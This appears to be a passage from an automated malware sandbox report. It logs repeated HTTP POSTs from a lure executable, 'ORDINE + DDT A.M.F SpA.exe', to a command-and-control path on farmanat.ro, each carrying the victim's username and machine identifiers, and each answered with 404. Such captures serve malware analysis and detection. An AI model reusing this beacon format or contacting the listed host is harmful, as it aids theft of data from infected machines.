                                              Nov 25, 2021 10:52:14.189707041 CET6985OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:14.223253965 CET6985OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:14.273739100 CET6986INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:13 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              481192.168.11.2050325176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:14.713649988 CET6986OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:14.747116089 CET6987OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:14.800133944 CET6987INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:13 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              482192.168.11.2050326176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:15.234437943 CET6988OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:15.268006086 CET6988OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:15.320163965 CET6988INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:14 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              483192.168.11.2050327176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:15.707320929 CET6989OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:15.741425037 CET6989OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:15.799293995 CET6990INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:14 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              484192.168.11.2050328176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:16.204602957 CET6990OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:16.238796949 CET6991OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:16.295562983 CET6991INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:15 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              485192.168.11.2050329176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:16.719602108 CET6992OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:16.753187895 CET6992OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:16.805646896 CET6992INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:15 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              486192.168.11.2050330176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:17.227828979 CET6993OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:17.262125015 CET6993OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:17.314026117 CET6994INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:16 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              487192.168.11.2050331176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:17.758847952 CET6994OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:17.792740107 CET6994OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:17.842144966 CET6995INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:16 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              488192.168.11.2050332176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:18.265321016 CET6996OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:18.298950911 CET6996OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:18.348356009 CET6996INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:17 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              489192.168.11.2050333176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:18.757230997 CET6997OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:18.791583061 CET6997OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:18.841252089 CET6998INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:17 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              49192.168.11.2049885176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:33.088495016 CET6378OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:33.122982025 CET6378OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:33.174014091 CET6378INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:32 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              490192.168.11.2050334176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:19.260157108 CET6998OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:19.294414997 CET6998OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:19.345704079 CET6999INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:18 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              491192.168.11.2050335176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:19.780977964 CET7000OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:19.814631939 CET7000OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:19.863940954 CET7000INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:18 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              492192.168.11.2050336176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:20.285330057 CET7001OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:20.319498062 CET7001OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:20.387083054 CET7002INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:19 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              493192.168.11.2050337176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:20.716730118 CET7002OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:20.750154972 CET7002OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:20.803515911 CET7003INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:19 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              494192.168.11.2050338176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:21.237790108 CET7004OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:21.271239042 CET7004OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:21.325181961 CET7004INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:20 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              495192.168.11.2050339176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:21.714998007 CET7005OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:21.749106884 CET7005OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:21.807549953 CET7005INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:20 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              496192.168.11.2050340176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:22.226974964 CET7006OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:22.260694981 CET7006OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:22.313255072 CET7007INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:21 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              497192.168.11.2050341176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:22.744389057 CET7008OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:22.778665066 CET7008OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:22.829025030 CET7008INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:21 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
